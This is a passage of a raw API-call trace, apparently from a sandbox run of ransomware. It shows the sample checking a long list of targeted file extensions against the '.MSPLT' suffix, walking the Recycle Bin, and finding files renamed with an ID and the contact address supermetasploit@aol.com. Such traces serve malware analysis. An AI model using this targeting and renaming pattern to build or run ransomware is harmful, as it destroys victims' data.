[0167.840] lstrcmpiW (lpString1=".class", lpString2=".MSPLT") returned -1 [0167.840] lstrlenW (lpString=".clx") returned 4 [0167.840] lstrcmpiW (lpString1=".clx", lpString2="SPLT") returned -1 [0167.840] lstrlenW (lpString=".config") returned 7 [0167.840] lstrcmpiW (lpString1=".config", lpString2="].MSPLT") returned -1 [0167.840] lstrlenW (lpString=".cpp") returned 4 [0167.840] lstrcmpiW (lpString1=".cpp", lpString2="SPLT") returned -1 [0167.840] lstrlenW (lpString=".cr2") returned 4 [0167.840] lstrcmpiW (lpString1=".cr2", lpString2="SPLT") returned -1 [0167.840] lstrlenW (lpString=".crt") returned 4 [0167.840] lstrcmpiW (lpString1=".crt", lpString2="SPLT") returned -1 [0167.840] lstrlenW (lpString=".crw") returned 4 [0167.840] lstrcmpiW (lpString1=".crw", lpString2="SPLT") returned -1 [0167.840] lstrlenW (lpString=".cs") returned 3 [0167.840] lstrcmpiW (lpString1=".cs", lpString2="PLT") returned -1 [0167.840] lstrlenW (lpString=".css") returned 4 [0167.840] lstrcmpiW (lpString1=".css", lpString2="SPLT") returned -1 [0167.840] lstrlenW (lpString=".csv") returned 4 [0167.841] lstrcmpiW (lpString1=".csv", lpString2="SPLT") returned -1 [0167.841] lstrlenW (lpString=".cub") returned 4 [0167.841] lstrcmpiW (lpString1=".cub", lpString2="SPLT") returned -1 [0167.841] lstrlenW (lpString=".dae") returned 4 [0167.841] lstrcmpiW (lpString1=".dae", lpString2="SPLT") returned -1 [0167.841] lstrlenW (lpString=".dat") returned 4 [0167.841] lstrcmpiW (lpString1=".dat", lpString2="SPLT") returned -1 [0167.841] lstrlenW (lpString=".db") returned 3 [0167.841] lstrcmpiW (lpString1=".db", lpString2="PLT") returned -1 [0167.841] lstrlenW (lpString=".dbf") returned 4 [0167.841] lstrcmpiW (lpString1=".dbf", lpString2="SPLT") returned -1 [0167.841] lstrlenW (lpString=".dbx") returned 4 [0167.841] lstrcmpiW (lpString1=".dbx", lpString2="SPLT") returned -1 [0167.841] lstrlenW (lpString=".dc3") returned 4 [0167.841] lstrcmpiW (lpString1=".dc3", lpString2="SPLT") returned -1 [0167.841] lstrlenW (lpString=".dcm") returned 4 [0167.841] lstrcmpiW (lpString1=".dcm", lpString2="SPLT") returned -1 [0167.841] lstrlenW (lpString=".dcr") returned 4 [0167.841] lstrcmpiW (lpString1=".dcr", lpString2="SPLT") returned -1 [0167.841] lstrlenW (lpString=".der") returned 4 [0167.841] lstrcmpiW (lpString1=".der", lpString2="SPLT") returned -1 [0167.841] lstrlenW (lpString=".dib") returned 4 [0167.841] lstrcmpiW (lpString1=".dib", lpString2="SPLT") returned -1 [0167.841] lstrlenW (lpString=".dic") returned 4 [0167.841] lstrcmpiW (lpString1=".dic", lpString2="SPLT") returned -1 [0167.841] lstrlenW (lpString=".dif") returned 4 [0167.841] lstrcmpiW (lpString1=".dif", lpString2="SPLT") returned -1 [0167.842] lstrlenW (lpString=".divx") returned 5 [0167.842] lstrcmpiW (lpString1=".divx", lpString2="MSPLT") returned -1 [0167.842] lstrlenW (lpString=".djvu") returned 5 [0167.842] lstrcmpiW (lpString1=".djvu", lpString2="MSPLT") returned -1 [0167.842] lstrlenW (lpString=".dng") returned 4 [0167.842] lstrcmpiW (lpString1=".dng", lpString2="SPLT") returned -1 [0167.842] lstrlenW (lpString=".doc") returned 4 [0167.842] lstrcmpiW (lpString1=".doc", lpString2="SPLT") returned -1 [0167.842] lstrlenW (lpString=".docm") returned 5 [0167.842] lstrcmpiW (lpString1=".docm", lpString2="MSPLT") returned -1 [0167.842] lstrlenW (lpString=".docx") returned 5 [0167.842] lstrcmpiW (lpString1=".docx", lpString2="MSPLT") returned -1 [0167.842] lstrlenW (lpString=".dot") returned 4 [0167.842] lstrcmpiW (lpString1=".dot", lpString2="SPLT") returned -1 [0167.842] lstrlenW (lpString=".dotm") returned 5 [0167.842] lstrcmpiW (lpString1=".dotm", lpString2="MSPLT") returned -1 [0167.842] lstrlenW (lpString=".dotx") returned 5 [0167.842] lstrcmpiW (lpString1=".dotx", lpString2="MSPLT") returned -1 [0167.842] lstrlenW (lpString=".dpx") returned 4 [0167.842] lstrcmpiW (lpString1=".dpx", lpString2="SPLT") returned -1 [0167.842] lstrlenW (lpString=".dqy") returned 4 [0167.842] lstrcmpiW (lpString1=".dqy", lpString2="SPLT") returned -1 [0167.842] lstrlenW (lpString=".dsn") returned 4 [0167.842] lstrcmpiW (lpString1=".dsn", lpString2="SPLT") returned -1 [0167.842] lstrlenW (lpString=".dt") returned 3 [0167.842] lstrcmpiW (lpString1=".dt", lpString2="PLT") returned -1 [0167.842] lstrlenW (lpString=".dtd") returned 4 [0167.842] lstrcmpiW (lpString1=".dtd", lpString2="SPLT") returned -1 [0167.843] lstrlenW (lpString=".dwg") returned 4 [0167.843] lstrcmpiW (lpString1=".dwg", lpString2="SPLT") returned -1 [0167.843] lstrlenW (lpString=".dwt") returned 4 [0167.843] lstrcmpiW (lpString1=".dwt", lpString2="SPLT") returned -1 [0167.843] lstrlenW (lpString=".dx") returned 3 [0167.843] lstrcmpiW (lpString1=".dx", lpString2="PLT") returned -1 [0167.843] lstrlenW (lpString=".dxf") returned 4 [0167.843] lstrcmpiW (lpString1=".dxf", lpString2="SPLT") returned -1 [0167.843] lstrlenW (lpString=".edml") returned 5 [0167.843] lstrcmpiW (lpString1=".edml", lpString2="MSPLT") returned -1 [0167.843] lstrlenW (lpString=".efd") returned 4 [0167.843] lstrcmpiW (lpString1=".efd", lpString2="SPLT") returned -1 [0167.843] lstrlenW (lpString=".elf") returned 4 [0167.843] lstrcmpiW (lpString1=".elf", lpString2="SPLT") returned -1 [0167.843] lstrlenW (lpString=".emf") returned 4 [0167.843] lstrcmpiW (lpString1=".emf", lpString2="SPLT") returned -1 [0167.843] lstrlenW (lpString=".emz") returned 4 [0167.843] lstrcmpiW (lpString1=".emz", lpString2="SPLT") returned -1 [0167.843] lstrlenW (lpString=".epf") returned 4 [0167.843] lstrcmpiW (lpString1=".epf", lpString2="SPLT") returned -1 [0167.843] lstrlenW (lpString=".eps") returned 4 [0167.843] lstrcmpiW (lpString1=".eps", lpString2="SPLT") returned -1 [0167.843] lstrlenW (lpString=".epsf") returned 5 [0167.843] lstrcmpiW (lpString1=".epsf", lpString2="MSPLT") returned -1 [0167.843] lstrlenW (lpString=".epsp") returned 5 [0167.843] lstrcmpiW (lpString1=".epsp", lpString2="MSPLT") returned -1 [0167.843] lstrlenW (lpString=".erf") returned 4 [0167.844] lstrcmpiW (lpString1=".erf", lpString2="SPLT") returned -1 [0167.844] lstrlenW (lpString=".exr") returned 4 [0167.844] lstrcmpiW (lpString1=".exr", lpString2="SPLT") returned -1 [0167.844] lstrlenW (lpString=".f4v") returned 4 [0167.844] lstrcmpiW (lpString1=".f4v", lpString2="SPLT") returned -1 [0167.844] lstrlenW (lpString=".fido") returned 5 [0167.844] lstrcmpiW (lpString1=".fido", lpString2="MSPLT") returned -1 [0167.844] lstrlenW (lpString=".flm") returned 4 [0167.844] lstrcmpiW (lpString1=".flm", lpString2="SPLT") returned -1 [0167.844] lstrlenW (lpString=".flv") returned 4 [0167.844] lstrcmpiW (lpString1=".flv", lpString2="SPLT") returned -1 [0167.844] lstrlenW (lpString=".frm") returned 4 [0167.844] lstrcmpiW (lpString1=".frm", lpString2="SPLT") returned -1 [0167.844] lstrlenW (lpString=".fxg") returned 4 [0167.844] lstrcmpiW (lpString1=".fxg", lpString2="SPLT") returned -1 [0167.844] lstrlenW (lpString=".geo") returned 4 [0167.844] lstrcmpiW (lpString1=".geo", lpString2="SPLT") returned -1 [0167.844] lstrlenW (lpString=".gif") returned 4 [0167.844] lstrcmpiW (lpString1=".gif", lpString2="SPLT") returned -1 [0167.844] lstrlenW (lpString=".grs") returned 4 [0167.844] lstrcmpiW (lpString1=".grs", lpString2="SPLT") returned -1 [0167.844] lstrlenW (lpString=".gz") returned 3 [0167.844] lstrcmpiW (lpString1=".gz", lpString2="PLT") returned -1 [0167.844] lstrlenW (lpString=".h") returned 2 [0167.844] lstrcmpiW (lpString1=".h", lpString2="LT") returned -1 [0167.844] lstrlenW (lpString=".hdr") returned 4 [0167.844] lstrcmpiW (lpString1=".hdr", lpString2="SPLT") returned -1 [0167.844] lstrlenW (lpString=".hpp") returned 4 [0167.845] lstrcmpiW (lpString1=".hpp", lpString2="SPLT") returned -1 [0167.845] lstrlenW (lpString=".hta") returned 4 [0167.845] lstrcmpiW (lpString1=".hta", lpString2="SPLT") returned -1 [0167.845] lstrlenW (lpString=".htc") returned 4 [0167.845] lstrcmpiW (lpString1=".htc", lpString2="SPLT") returned -1 [0167.845] lstrlenW (lpString=".htm") returned 4 [0167.845] lstrcmpiW (lpString1=".htm", lpString2="SPLT") returned -1 [0167.845] lstrlenW (lpString=".html") returned 5 [0167.845] lstrcmpiW (lpString1=".html", lpString2="MSPLT") returned -1 [0167.845] lstrlenW (lpString=".icb") returned 4 [0167.845] lstrcmpiW (lpString1=".icb", lpString2="SPLT") returned -1 [0167.845] lstrlenW (lpString=".ics") returned 4 [0167.845] lstrcmpiW (lpString1=".ics", lpString2="SPLT") returned -1 [0167.845] lstrlenW (lpString=".iff") returned 4 [0167.845] lstrcmpiW (lpString1=".iff", lpString2="SPLT") returned -1 [0167.845] lstrlenW (lpString=".inc") returned 4 [0167.845] lstrcmpiW (lpString1=".inc", lpString2="SPLT") returned -1 [0167.845] lstrlenW (lpString=".indd") returned 5 [0167.845] lstrcmpiW (lpString1=".indd", lpString2="MSPLT") returned -1 [0167.845] lstrlenW (lpString=".ini") returned 4 [0167.845] lstrcmpiW (lpString1=".ini", lpString2="SPLT") returned -1 [0167.845] lstrlenW (lpString=".iqy") returned 4 [0167.845] lstrcmpiW (lpString1=".iqy", lpString2="SPLT") returned -1 [0167.845] lstrlenW (lpString=".j2c") returned 4 [0167.845] lstrcmpiW (lpString1=".j2c", lpString2="SPLT") returned -1 [0167.845] lstrlenW (lpString=".j2k") returned 4 [0167.845] lstrcmpiW (lpString1=".j2k", lpString2="SPLT") returned -1 [0167.845] lstrlenW (lpString=".java") returned 5 [0167.846] lstrcmpiW (lpString1=".java", lpString2="MSPLT") returned -1 [0167.846] lstrlenW (lpString=".jp2") returned 4 [0167.846] lstrcmpiW (lpString1=".jp2", lpString2="SPLT") returned -1 [0167.846] lstrlenW (lpString=".jpc") returned 4 [0167.846] lstrcmpiW (lpString1=".jpc", lpString2="SPLT") returned -1 [0167.846] lstrlenW (lpString=".jpe") returned 4 [0167.846] lstrcmpiW (lpString1=".jpe", lpString2="SPLT") returned -1 [0167.846] lstrlenW (lpString=".jpeg") returned 5 [0167.846] lstrcmpiW (lpString1=".jpeg", lpString2="MSPLT") returned -1 [0167.846] lstrlenW (lpString=".jpf") returned 4 [0167.846] lstrcmpiW (lpString1=".jpf", lpString2="SPLT") returned -1 [0167.846] lstrlenW (lpString=".jpg") returned 4 [0167.846] lstrcmpiW (lpString1=".jpg", lpString2="SPLT") returned -1 [0167.846] lstrlenW (lpString=".jpx") returned 4 [0167.846] lstrcmpiW (lpString1=".jpx", lpString2="SPLT") returned -1 [0167.846] lstrlenW (lpString=".js") returned 3 [0167.846] lstrcmpiW (lpString1=".js", lpString2="PLT") returned -1 [0167.846] lstrlenW (lpString=".jsf") returned 4 [0167.846] lstrcmpiW (lpString1=".jsf", lpString2="SPLT") returned -1 [0167.846] lstrlenW (lpString=".json") returned 5 [0167.846] lstrcmpiW (lpString1=".json", lpString2="MSPLT") returned -1 [0167.846] lstrlenW (lpString=".jsp") returned 4 [0167.846] lstrcmpiW (lpString1=".jsp", lpString2="SPLT") returned -1 [0167.846] lstrlenW (lpString=".kdc") returned 4 [0167.846] lstrcmpiW (lpString1=".kdc", lpString2="SPLT") returned -1 [0167.846] lstrlenW (lpString=".kmz") returned 4 [0167.846] lstrcmpiW (lpString1=".kmz", lpString2="SPLT") returned -1 [0167.846] lstrlenW (lpString=".kwm") returned 4 [0167.847] lstrcmpiW (lpString1=".kwm", lpString2="SPLT") returned -1 [0167.847] lstrlenW (lpString=".lasso") returned 6 [0167.847] lstrcmpiW (lpString1=".lasso", lpString2=".MSPLT") returned -1 [0167.847] lstrlenW (lpString=".lbi") returned 4 [0167.847] lstrcmpiW (lpString1=".lbi", lpString2="SPLT") returned -1 [0167.847] lstrlenW (lpString=".lgf") returned 4 [0167.847] lstrcmpiW (lpString1=".lgf", lpString2="SPLT") returned -1 [0167.847] lstrlenW (lpString=".lgp") returned 4 [0167.847] lstrcmpiW (lpString1=".lgp", lpString2="SPLT") returned -1 [0167.847] lstrlenW (lpString=".log") returned 4 [0167.847] lstrcmpiW (lpString1=".log", lpString2="SPLT") returned -1 [0167.847] lstrlenW (lpString=".m1v") returned 4 [0167.847] lstrcmpiW (lpString1=".m1v", lpString2="SPLT") returned -1 [0167.847] lstrlenW (lpString=".m4a") returned 4 [0167.847] lstrcmpiW (lpString1=".m4a", lpString2="SPLT") returned -1 [0167.847] lstrlenW (lpString=".m4v") returned 4 [0167.847] lstrcmpiW (lpString1=".m4v", lpString2="SPLT") returned -1 [0167.847] lstrlenW (lpString=".max") returned 4 [0167.847] lstrcmpiW (lpString1=".max", lpString2="SPLT") returned -1 [0167.847] lstrlenW (lpString=".md") returned 3 [0167.847] lstrcmpiW (lpString1=".md", lpString2="PLT") returned -1 [0167.847] lstrlenW (lpString=".mda") returned 4 [0167.847] lstrcmpiW (lpString1=".mda", lpString2="SPLT") returned -1 [0167.847] lstrlenW (lpString=".mdb") returned 4 [0167.847] lstrcmpiW (lpString1=".mdb", lpString2="SPLT") returned -1 [0167.847] lstrlenW (lpString=".mde") returned 4 [0167.847] lstrcmpiW (lpString1=".mde", lpString2="SPLT") returned -1 [0167.847] lstrlenW (lpString=".mdf") returned 4 [0167.848] lstrcmpiW (lpString1=".mdf", lpString2="SPLT") returned -1 [0167.848] lstrlenW (lpString=".mdw") returned 4 [0167.848] lstrcmpiW (lpString1=".mdw", lpString2="SPLT") returned -1 [0167.848] lstrlenW (lpString=".mef") returned 4 [0167.848] lstrcmpiW (lpString1=".mef", lpString2="SPLT") returned -1 [0167.848] lstrlenW (lpString=".mft") returned 4 [0167.848] lstrcmpiW (lpString1=".mft", lpString2="SPLT") returned -1 [0167.848] lstrlenW (lpString=".mfw") returned 4 [0167.848] lstrcmpiW (lpString1=".mfw", lpString2="SPLT") returned -1 [0167.848] lstrlenW (lpString=".mht") returned 4 [0167.848] lstrcmpiW (lpString1=".mht", lpString2="SPLT") returned -1 [0167.848] lstrlenW (lpString=".mhtml") returned 6 [0167.848] lstrcmpiW (lpString1=".mhtml", lpString2=".MSPLT") returned -1 [0167.848] lstrlenW (lpString=".mka") returned 4 [0167.848] lstrcmpiW (lpString1=".mka", lpString2="SPLT") returned -1 [0167.848] lstrlenW (lpString=".mkidx") returned 6 [0167.848] lstrcmpiW (lpString1=".mkidx", lpString2=".MSPLT") returned -1 [0167.848] lstrlenW (lpString=".mkv") returned 4 [0167.848] lstrcmpiW (lpString1=".mkv", lpString2="SPLT") returned -1 [0167.848] lstrlenW (lpString=".mos") returned 4 [0167.848] lstrcmpiW (lpString1=".mos", lpString2="SPLT") returned -1 [0167.848] lstrlenW (lpString=".mov") returned 4 [0167.848] lstrcmpiW (lpString1=".mov", lpString2="SPLT") returned -1 [0167.848] lstrlenW (lpString=".mp3") returned 4 [0167.848] lstrcmpiW (lpString1=".mp3", lpString2="SPLT") returned -1 [0167.848] lstrlenW (lpString=".mp4") returned 4 [0167.848] lstrcmpiW (lpString1=".mp4", lpString2="SPLT") returned -1 [0167.849] lstrlenW (lpString=".mpeg") returned 5 [0167.849] lstrcmpiW (lpString1=".mpeg", lpString2="MSPLT") returned -1 [0167.849] lstrlenW (lpString=".mpg") returned 4 [0167.849] lstrcmpiW (lpString1=".mpg", lpString2="SPLT") returned -1 [0167.849] lstrlenW (lpString=".mpv") returned 4 [0167.849] lstrcmpiW (lpString1=".mpv", lpString2="SPLT") returned -1 [0167.849] lstrlenW (lpString=".mrw") returned 4 [0167.849] lstrcmpiW (lpString1=".mrw", lpString2="SPLT") returned -1 [0167.849] lstrlenW (lpString=".msg") returned 4 [0167.849] lstrcmpiW (lpString1=".msg", lpString2="SPLT") returned -1 [0167.849] lstrlenW (lpString=".mxl") returned 4 [0167.849] lstrcmpiW (lpString1=".mxl", lpString2="SPLT") returned -1 [0167.849] lstrlenW (lpString=".myd") returned 4 [0167.849] lstrcmpiW (lpString1=".myd", lpString2="SPLT") returned -1 [0167.849] lstrlenW (lpString=".myi") returned 4 [0167.849] lstrcmpiW (lpString1=".myi", lpString2="SPLT") returned -1 [0167.849] lstrlenW (lpString=".nef") returned 4 [0167.849] lstrcmpiW (lpString1=".nef", lpString2="SPLT") returned -1 [0167.849] lstrlenW (lpString=".nrw") returned 4 [0167.849] lstrcmpiW (lpString1=".nrw", lpString2="SPLT") returned -1 [0167.849] lstrlenW (lpString=".obj") returned 4 [0167.849] lstrcmpiW (lpString1=".obj", lpString2="SPLT") returned -1 [0167.849] lstrlenW (lpString=".odb") returned 4 [0167.849] lstrcmpiW (lpString1=".odb", lpString2="SPLT") returned -1 [0167.849] lstrlenW (lpString=".odc") returned 4 [0167.849] lstrcmpiW (lpString1=".odc", lpString2="SPLT") returned -1 [0167.849] lstrlenW (lpString=".odm") returned 4 [0167.849] lstrcmpiW (lpString1=".odm", lpString2="SPLT") returned -1 [0167.850] lstrlenW (lpString=".odp") returned 4 [0167.850] lstrcmpiW (lpString1=".odp", lpString2="SPLT") returned -1 [0167.850] lstrlenW (lpString=".ods") returned 4 [0167.850] lstrcmpiW (lpString1=".ods", lpString2="SPLT") returned -1 [0167.850] lstrlenW (lpString=".oft") returned 4 [0167.850] lstrcmpiW (lpString1=".oft", lpString2="SPLT") returned -1 [0167.850] lstrlenW (lpString=".one") returned 4 [0167.850] lstrcmpiW (lpString1=".one", lpString2="SPLT") returned -1 [0167.850] lstrlenW (lpString=".onepkg") returned 7 [0167.850] lstrcmpiW (lpString1=".onepkg", lpString2="].MSPLT") returned -1 [0167.850] lstrlenW (lpString=".onetoc2") returned 8 [0167.850] lstrcmpiW (lpString1=".onetoc2", lpString2="m].MSPLT") returned -1 [0167.850] lstrlenW (lpString=".opt") returned 4 [0167.850] lstrcmpiW (lpString1=".opt", lpString2="SPLT") returned -1 [0167.850] lstrlenW (lpString=".oqy") returned 4 [0167.850] lstrcmpiW (lpString1=".oqy", lpString2="SPLT") returned -1 [0167.850] lstrlenW (lpString=".orf") returned 4 [0167.850] lstrcmpiW (lpString1=".orf", lpString2="SPLT") returned -1 [0167.850] lstrlenW (lpString=".p12") returned 4 [0167.850] lstrcmpiW (lpString1=".p12", lpString2="SPLT") returned -1 [0167.850] lstrlenW (lpString=".p7b") returned 4 [0167.850] lstrcmpiW (lpString1=".p7b", lpString2="SPLT") returned -1 [0167.850] lstrlenW (lpString=".p7c") returned 4 [0167.850] lstrcmpiW (lpString1=".p7c", lpString2="SPLT") returned -1 [0167.850] lstrlenW (lpString=".pam") returned 4 [0167.850] lstrcmpiW (lpString1=".pam", lpString2="SPLT") returned -1 [0167.850] lstrlenW (lpString=".pbm") returned 4 [0167.851] lstrcmpiW (lpString1=".pbm", lpString2="SPLT") returned -1 [0167.851] lstrlenW (lpString=".pct") returned 4 [0167.851] lstrcmpiW (lpString1=".pct", lpString2="SPLT") returned -1 [0167.851] lstrlenW (lpString=".pcx") returned 4 [0167.851] lstrcmpiW (lpString1=".pcx", lpString2="SPLT") returned -1 [0167.851] lstrlenW (lpString=".pdd") returned 4 [0167.851] lstrcmpiW (lpString1=".pdd", lpString2="SPLT") returned -1 [0167.851] lstrlenW (lpString=".pdf") returned 4 [0167.851] lstrcmpiW (lpString1=".pdf", lpString2="SPLT") returned -1 [0167.851] lstrlenW (lpString=".pdp") returned 4 [0167.851] lstrcmpiW (lpString1=".pdp", lpString2="SPLT") returned -1 [0167.851] lstrlenW (lpString=".pef") returned 4 [0167.851] lstrcmpiW (lpString1=".pef", lpString2="SPLT") returned -1 [0167.851] lstrlenW (lpString=".pem") returned 4 [0167.851] lstrcmpiW (lpString1=".pem", lpString2="SPLT") returned -1 [0167.851] lstrlenW (lpString=".pff") returned 4 [0167.851] lstrcmpiW (lpString1=".pff", lpString2="SPLT") returned -1 [0167.851] lstrlenW (lpString=".pfm") returned 4 [0167.851] lstrcmpiW (lpString1=".pfm", lpString2="SPLT") returned -1 [0167.851] lstrlenW (lpString=".pfx") returned 4 [0167.851] lstrcmpiW (lpString1=".pfx", lpString2="SPLT") returned -1 [0167.851] lstrlenW (lpString=".pgm") returned 4 [0167.851] lstrcmpiW (lpString1=".pgm", lpString2="SPLT") returned -1 [0167.851] lstrlenW (lpString=".php") returned 4 [0167.851] lstrcmpiW (lpString1=".php", lpString2="SPLT") returned -1 [0167.851] lstrlenW (lpString=".php3") returned 5 [0167.851] lstrcmpiW (lpString1=".php3", lpString2="MSPLT") returned -1 [0167.851] lstrlenW (lpString=".php4") returned 5 [0167.852] lstrcmpiW (lpString1=".php4", lpString2="MSPLT") returned -1 [0167.852] lstrlenW (lpString=".php5") returned 5 [0167.852] lstrcmpiW (lpString1=".php5", lpString2="MSPLT") returned -1 [0167.852] lstrlenW (lpString=".phtml") returned 6 [0167.852] lstrcmpiW (lpString1=".phtml", lpString2=".MSPLT") returned 1 [0167.852] lstrlenW (lpString=".pict") returned 5 [0167.852] lstrcmpiW (lpString1=".pict", lpString2="MSPLT") returned -1 [0167.852] lstrlenW (lpString=".pl") returned 3 [0167.852] lstrcmpiW (lpString1=".pl", lpString2="PLT") returned -1 [0167.852] lstrlenW (lpString=".pls") returned 4 [0167.852] lstrcmpiW (lpString1=".pls", lpString2="SPLT") returned -1 [0167.852] lstrlenW (lpString=".pm") returned 3 [0167.852] lstrcmpiW (lpString1=".pm", lpString2="PLT") returned -1 [0167.852] lstrlenW (lpString=".png") returned 4 [0167.852] lstrcmpiW (lpString1=".png", lpString2="SPLT") returned -1 [0167.852] lstrlenW (lpString=".pnm") returned 4 [0167.852] lstrcmpiW (lpString1=".pnm", lpString2="SPLT") returned -1 [0167.852] lstrlenW (lpString=".pot") returned 4 [0167.852] lstrcmpiW (lpString1=".pot", lpString2="SPLT") returned -1 [0167.852] lstrlenW (lpString=".potm") returned 5 [0167.852] lstrcmpiW (lpString1=".potm", lpString2="MSPLT") returned -1 [0167.852] lstrlenW (lpString=".potx") returned 5 [0167.852] lstrcmpiW (lpString1=".potx", lpString2="MSPLT") returned -1 [0167.852] lstrlenW (lpString=".ppa") returned 4 [0167.852] lstrcmpiW (lpString1=".ppa", lpString2="SPLT") returned -1 [0167.852] lstrlenW (lpString=".ppam") returned 5 [0167.852] lstrcmpiW (lpString1=".ppam", lpString2="MSPLT") returned -1 [0167.852] lstrlenW (lpString=".ppm") returned 4 [0167.852] lstrcmpiW (lpString1=".ppm", lpString2="SPLT") returned -1 [0167.853] lstrlenW (lpString=".pps") returned 4 [0167.853] lstrcmpiW (lpString1=".pps", lpString2="SPLT") returned -1 [0167.853] lstrlenW (lpString=".ppsm") returned 5 [0167.853] lstrcmpiW (lpString1=".ppsm", lpString2="MSPLT") returned -1 [0167.853] lstrlenW (lpString=".ppt") returned 4 [0167.853] lstrcmpiW (lpString1=".ppt", lpString2="SPLT") returned -1 [0167.853] lstrlenW (lpString=".pptm") returned 5 [0167.853] lstrcmpiW (lpString1=".pptm", lpString2="MSPLT") returned -1 [0167.853] lstrlenW (lpString=".pptx") returned 5 [0167.853] lstrcmpiW (lpString1=".pptx", lpString2="MSPLT") returned -1 [0167.853] lstrlenW (lpString=".prn") returned 4 [0167.853] lstrcmpiW (lpString1=".prn", lpString2="SPLT") returned -1 [0167.853] lstrlenW (lpString=".ps") returned 3 [0167.853] lstrcmpiW (lpString1=".ps", lpString2="PLT") returned -1 [0167.853] lstrlenW (lpString=".psb") returned 4 [0167.853] lstrcmpiW (lpString1=".psb", lpString2="SPLT") returned -1 [0167.853] lstrlenW (lpString=".psd") returned 4 [0167.853] lstrcmpiW (lpString1=".psd", lpString2="SPLT") returned -1 [0167.853] lstrlenW (lpString=".pst") returned 4 [0167.903] lstrcmpiW (lpString1=".pst", lpString2="SPLT") returned -1 [0167.903] lstrlenW (lpString=".ptx") returned 4 [0167.903] lstrcmpiW (lpString1=".ptx", lpString2="SPLT") returned -1 [0167.903] lstrlenW (lpString=".pub") returned 4 [0167.903] lstrcmpiW (lpString1=".pub", lpString2="SPLT") returned -1 [0167.903] lstrlenW (lpString=".pwm") returned 4 [0167.903] lstrcmpiW (lpString1=".pwm", lpString2="SPLT") returned -1 [0167.903] lstrlenW (lpString=".pxr") returned 4 [0167.903] lstrcmpiW (lpString1=".pxr", lpString2="SPLT") returned -1 [0167.903] FindNextFileW (in: hFindFile=0x801f58, lpFindFileData=0x391f800 | out: lpFindFileData=0x391f800*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x58e6ddfa, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x58e6ddfa, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x58e6ddfa, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x17a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="DESKTO~1.MSP")) returned 0 [0167.904] FindClose (in: hFindFile=0x801f58 | out: hFindFile=0x801f58) returned 1 [0167.904] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3e90058 | out: hHeap=0x710000) returned 1 [0167.904] FindNextFileW (in: hFindFile=0x801e98, lpFindFileData=0x391fa7c | out: lpFindFileData=0x391fa7c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcb9438a8, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x11a5eef8, ftLastAccessTime.dwHighDateTime=0x1d3375b, ftLastWriteTime.dwLowDateTime=0x11a5eef8, ftLastWriteTime.dwHighDateTime=0x1d3375b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="S-1-5-21-1051304884-625712362-2192934891-1000", cAlternateFileName="S-1-5-~1")) returned 1 [0167.904] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xfffe) returned 0x3e90058 [0167.904] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\*", lpFindFileData=0x391f800 | out: lpFindFileData=0x391f800*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcb9438a8, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x11a5eef8, ftLastAccessTime.dwHighDateTime=0x1d3375b, ftLastWriteTime.dwLowDateTime=0x593cb2af, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x802158 [0167.904] FindNextFileW (in: hFindFile=0x802158, lpFindFileData=0x391f800 | out: lpFindFileData=0x391f800*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcb9438a8, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x11a5eef8, ftLastAccessTime.dwHighDateTime=0x1d3375b, ftLastWriteTime.dwLowDateTime=0x593cb2af, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0167.904] FindNextFileW (in: hFindFile=0x802158, lpFindFileData=0x391f800 | out: lpFindFileData=0x391f800*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x593a4fb8, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x593a4fb8, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x593cb2af, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x17a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="DESKTO~1.MSP")) returned 1 [0167.904] FindNextFileW (in: hFindFile=0x802158, lpFindFileData=0x391f800 | out: lpFindFileData=0x391f800*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x593a4fb8, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x593a4fb8, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x593cb2af, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x17a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="DESKTO~1.MSP")) returned 0 [0167.904] FindClose (in: hFindFile=0x802158 | out: hFindFile=0x802158) returned 1 [0167.905] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3e90058 | out: hHeap=0x710000) returned 1 [0167.905] FindNextFileW (in: hFindFile=0x801e98, lpFindFileData=0x391fa7c | out: lpFindFileData=0x391fa7c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcb9438a8, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x11a5eef8, ftLastAccessTime.dwHighDateTime=0x1d3375b, 